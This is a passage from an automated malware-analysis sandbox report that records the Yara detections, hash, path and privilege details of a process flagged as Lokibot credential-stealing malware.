                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                            Antivirus matches:
                            • Detection: 11%, ReversingLabs
                            Reputation:low

                            Analysis Process: vbc.exe PID: 3052 Parent PID: 2856

                            General

                            Start time:12:29:18
                            Start date:16/06/2021
                            Path:C:\Users\Public\vbc.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\Public\vbc.exe
                            Imagebase:0xd00000
                            File size:761856 bytes
                            MD5 hash:7146B0D2CAED6422C289A08F63A5C685
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                            Reputation:low

                            Disassembly

                            Code Analysis

                            Reset < >